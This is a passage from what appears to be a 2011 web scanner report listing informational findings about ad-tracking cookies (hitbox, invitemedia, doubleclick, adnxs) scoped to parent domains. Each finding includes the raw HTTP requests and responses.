Severity:   Information
Confidence:   Certain
Host:   http://ehg-aaa.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550120M4ND07EN3&cd=1&hv=6&n=/home.aspx&con=&vcon=/en-nne/Pages&tt=auto&ja=y&dt=14&zo=300&lm=1311102271000&bn=Netscape&ce=y&ss=1920*1200&sc=24&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0140s&vjs=HBX0150.01s&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&lv.id=&lv.pos=&ttt=lid,lpos&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pl=Mozilla%20Default%20Plug-in%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3AWPI%20Detector%201.3%3A&hid=0.7788128023153735 HTTP/1.1
Host: ehg-aaa.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com
Cookie: CTG=1310995053; WSS_GW=V1z%X%r^^QrCr

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:40 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%%%rBB@^; path=/; domain=.hitbox.com; expires=Wed, 18-Jul-2012 19:04:40 GMT; max-age=31536000
Set-Cookie: CTG=1311102280; path=/; domain=.hitbox.com; expires=Tue, 26-Jul-2011 19:04:40 GMT; max-age=604800
Set-Cookie: DM550120M4NDV6=V1r@(#X"rz%X%%%rBB@^eer%@ez%zrz%"%X%%%rBB@^z%X%%%rBB@^"%X%%%rBBir"%X%%%rBB@^eer%@e"%z(xB$aTxB[TTaxB$YIWaFxB$O:maxB(IFGKz7}z)OuKr6%rrzA6aT"TTa6YIWaF6O:ma|IFGK; path=/; domain=ehg-aaa.hitbox.com; expires=Wed, 18-Jul-2012 19:04:40 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Tue, 19 Jul 2011 19:04:41 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.48. http://g-pixel.invitemedia.com/gmatcher  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gmatcher?id=CAESEBL6QfFdOZBFuwKtr4mXcyc&cver=1 HTTP/1.1
Host: g-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fsharethis.com%2Fprivacy&jsref=&rnd=1311085721255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"318445\": [1310644253+ \"Th7YGwAJYV4K7GUs0lMuuA==\"+ 129398+ 75015+ 1685]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"609953\": [1310644252+ \"Th7YGgAJ5ZgK7GTR1UIraQ==\"+ 129395+ 75015+ 1685]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuFY/59JgFFi7obfH1gUGDVObgLSBowWYD6XDMftqyxA2TlQ2RNQWTCfS4Tj/mI2ASaJI10XgbIMGgwGDBYMQNGJy1iBepo3LUURfTuRTYBD4vEGVNFZM9iAapvWoorOfQwy4fqdJSiiK+aDRL81taKIrgG6n0niGZpo7wKQuS1nn75HFn09ESR68OF1FNHJ70HmXmjYjCL6eyFIdC6a6N2XoPCY8aEBRXQn0GVZEp/eI4uKcsz8wSLQyiyx6DSq8K6vLAITGSXOLf//Dll4FtCMa4wSV17+e4ds9NkXrALMEvue3kMR/fgK7LhdF1BEZ20Eid76fhAhCgCI44aO"; io_freq_p1="eJzjEuf4YSPAIjF3w+8PLAoMGgwGTBZzQGwuYY6DCQJMEke6LkIlGCwYgIJ9YQKMEs2blqIILokX4JR4vAFV8GU8UGXTWlTBOxFAwet3liAJinBsCxU4yCTxrakVRemyBKDSlrNP3yMLPo4BCl5o2IwieCEUKDgXTfBpAFBwxoeG98g2/QgUaGWWWHQaVfRWoMBERolzy/+/QzZgc4wAs8S+p/dQBI+C7J+76wKKYHc4UPDW94MIQQCXP1h1"; segments_p1="eJwtUk1LAlEUJWcWr1nNT+kH9BPaF7Rr16J+QxpCSRJYLbIvJosgyvyCPqSgEs2GSqiotIwgCyOpMWgCTbvn0OZw5tz7zj3vvjF05aQ1Q1czSeDZj0ew3OwQfN2F8lKEEqoAa88eQ1Obw0ansgbMte2Yo4tq80xOaoZqT+rm5eF0HXowh+5Wr9AUTbK0XW6Cz9fAE/vgC1RWvRiXdT3iHhkw9/7d3xso3vHo+JgmjnklkMN3/RxH1i+Aty76TnmLk2fwfBDzvX0SKxPXzKgVdnURYsO4zws6zoLA8BS88jxjV8GdT+BBg8jbLTrgqTa4jzPuOW+W1e8ElLcG5rV7JP9jv7ngyzL/RAWq1S30mCZ3BTTbHF2gSYzbudpC1WYM6wZY5dVL7FlhmEwAZ91f8Ai3NtrqEPvXIaE7UchPJcjXCfBFbuaEeUfbyBFXiJREcYTyh6zQUCW/bj40/Qyc4qS4wwQHwEqS70M9lAZ+8UeY68Irc5NBmtWWIEdMoRvsLroQAoNCAxy6VQCGj/COLWQpj2t/J9q2Gw=="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE1IjogWyIwMDQwMDMwMDE0MDAwMDA0NDk4NzIiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXSwgIjg0IjogWyJGejYrRVMvYzk5TzZ6NU9CIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 19-Jul-2011 14:28:18 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMzN119; Domain=invitemedia.com; expires=Wed, 18-Jul-2012 14:28:38 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.49. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1071926901/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1071926901/?random=1311087443803&cv=6&fst=1311087443803&num=1&fmt=3&value=0&label=arLzCN3WggIQ9ZyR_wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 19 Jul 2011 14:57:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Tue, 19-Jul-2011 15:12:18 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

13.50. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1071926901/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1071926901/?random=1311087498154&cv=6&fst=1311087498154&num=1&fmt=3&value=0&label=arLzCN3WggIQ9ZyR_wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 19 Jul 2011 14:58:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: id=22048e84020100ee||t=1311087492|et=730|cs=002213fd4810efdd35c9315ece; expires=Thu, 18-Jul-2013 14:58:12 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

13.51. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://cdnt.meteorsolutions.com/api/xid?xuid=$UID&svc=appnexus&uid=0ad1f409-c147-4bb9-a425-2684ee1031f7 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lCZ#-r-!h!'s#U3r0uD6D#NO<U[._EBREBk3rkv@<Ai5)2@w#HA9*-cK9v.A<S=L![Xg[?!Ev.(fdk6.DQYCQJ-n>*HdcaZuu5kIcagFDAI)RR3rqFW-vor'l^4QMBcbEiy=6PV/cE-Tl4<wk'c8?@v/.^'C!_U_r%*^R6A-G`d$t(e=@tVU/O<Wyn!uV*chhg5DBTg-5V$cQ+]D`ivJQ`8Wu5!D!c:fyvLH'7_:>5uJlH#!uLvlpUsWU8Y)V+$>1MP::@S(rLq>oW(Gq0G=>)E][MB8D'LvyoMVpRj5^FZYyj*g_Q>U/>!)k+vU!pl6mrulD4MrH#aenb6a1']39nxKTao[v)@q?xN:K2c?r693$))rIAToXkDINJ1%=8%YC%2x0*IO@[wWc#TgWhm[:wD_WHETl.a@mVO)IrDrDVmmzf.<dH5b>b>x2kmc>Mms2D(aqRk5>YT@HVZ*Bxr^0G7QNoS_kQ5%%Jg=/WSc1uhPIEa0%bXm*[MCnpg4:vXt[zy^wT%IQk_@rAGdzxy'CVH14^rcSr212I5_O2OgBh:Q$Y2m.ZwOEOv5YUzM/xt8[ol*Jh7>UjsYAwjMd:HTkSi0R'r.Z*.9fl+ep>^RE8)^1GH9WsY>@c8p?_t0(#TNge0Qv2vej@R)5=.5:sw2eT77v?BE@ebhn56VE//J3'7WL]0W<X8@r45L^yn)NoVB5B`ENA<_30EJ5tc3Q5Y0:esk2Utbx>xkUiu@=+Hs'*jK3$0Wg!)%

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 15:16:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 15:16:55 GMT; domain=.adnxs.com; HttpOnly
Location: http://cdnt.meteorsolutions.com/api/xid?xuid=3420415245200633085&svc=appnexus&uid=0ad1f409-c147-4bb9-a425-2684ee1031f7
Date: Tue, 19 Jul 2011 15:16:55 GMT
Content-Length: 0


13.52. http://ib.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=311&user=11fda490648f83c&seg_code=noseg&ord=1311108157 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG2<rfQCe7?0P(*AuB-u**g1:XIBOG#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(aFmBU*T`NNVR<M37Z$X.15R=d`(15ZWGC-(Q6GB$<'CNDvA9TrI<[)#nA'DDZ#`*t#GctC`:WA?8^$tLjhtk3Jy/B'b`=j+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!RNvLb)'V@@?iab*eFC<w6z$DO^Tcc.#XB=6U.'M7Q+4AdiD@gc[5FE]T[7U:0sov)-Jo>9R2c%^J4A/.0(bl'kok->q$+S; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:42:41 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:42:41 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:42:41 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; path=/; expires=Mon, 17-Oct-2011 20:42:41 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:42:41 GMT

GIF89a.............!.......,........@..L..;

13.53. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonglobe&size=160x600&imp_id=cm-10210473643_1311108278,11fda490648f83c&referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonglobe%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10210473643_1311108278%2C11fda490648f83c%2Cnone%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dnowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D551186%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1311108273%3F HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII1LEDEAoYAiACKAIwwNmX8QQQwNmX8QQYAQ..; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb575527=5_[r^XI()v4bi][?zqy!w=Td+?enc=HMdxnOM4DkAAAABAMzMLQAAAAEAzMwtAc2iR7Xy_EUC4HoXrUbgTQN1zHazSs38qOHCoZussF2TA7CVOAAAAAPcqCAA3AQAANQEAAAIAAACeyAcADSwBAAEAAABVU0QAVVNEAKAAWAKqKwAAnwQBAgUCAQUAAAAADB5xdgAAAAA.&tt_code=cm.quadbostonglobe&udj=uf%28%27a%27%2C+21322%2C+1311108288%29%3Buf%28%27r%27%2C+510110%2C+1311108288%29%3Bppv%2815053%2C+%273062363989047342045%27%2C+1311108288%2C+1316292288%2C+98060%2C+76813%29%3B&cnd=!gyE-tQiM_gUQnpEfGAAgjdgEMAA4qldAAEi1AlD31SBYAGDIAWgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBzczM9FG4E0DBAc3MzPRRuBNAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!lwRFJgiM_gUQnpEfGI3YBCAA; path=/; expires=Wed, 20-Jul-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rfQCe7?0P(*AuB-u**g1:XIBOG#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`O#eS@?iab*eFC<w6z$DO^Tcc.#XB=6U.'M7Q+4AdiD@gc[5FE]T[7U:0sov)-Jo>9R2c%^J4A/.0(bl'kqZ6?5yZZ; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 20:44:48 GMT
Content-Length: 386

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.340-bz.25;;cmw=nowl;sz=160x600;net=c
...[SNIP]...

13.54. http://ib.adnxs.com/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /px

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /px?id=9179&seg=98313&order_id=0ad1f409-c147-4bb9-a425-2684ee1031f7&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lCZ#-r-!h!'s#U3r0uD6D#NO<U[._EBREBk3rkv@<Ai5)2@w#HA9*-cK9v.A<S=L![Xg[?!Ev.(fdk6.DQYCQJ-n>*HdcaZuu5kIcagFDAI)RR3rqFW-vor'l^4QMBcbEiy=6PV/cE-Tl4<wk'c8?@v/.^'C!_U_r%*^R6A-G`d$t(e=@tVU/O<Wyn!uV*chhg5DBTg-5V$cQ+]D`ivJQ`8Wu5!D!c:fyvLH'7_:>5uJlH#!uLvlpUsWU8Y)V+$>1MP::@S(rLq>oW(Gq0G=>)E][MB8D'LvyoMVpRj5^FZYyj*g_Q>U/>!)k+vU!pl6mrulD4MrH#aenb6a1']39nxKTao[v)@q?xN:K2c?r693$))rIAToXkDINJ1%=8%YC%2x0*IO@[wWc#TgWhm[:wD_WHETl.a@mVO)IrDrDVmmzf.<dH5b>b>x2kmc>Mms2D(aqRk5>YT@HVZ*Bxr^0G7QNoS_kQ5%%Jg=/WSc1uhPIEa0%bXm*[MCnpg4:vXt[zy^wT%IQk_@rAGdzxy'CVH14^rcSr212I5_O2OgBh:Q$Y2m.ZwOEOv5YUzM/xt8[ol*Jh7>UjsYAwjMd:HTkSi0R'r.Z*.9fl+ep>^RE8)^1GH9WsY>@c8p?_t0(#TNge0Qv2vej@R)5=.5:sw2eT77v?BE@ebhn56VE//J3'7WL]0W<X8@r45L^yn)NoVB5B`ENA<_30EJ5tc3Q5Y0:esk2Utbx>xkUiu@=+Hs'*jK3$0Wg!)%

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
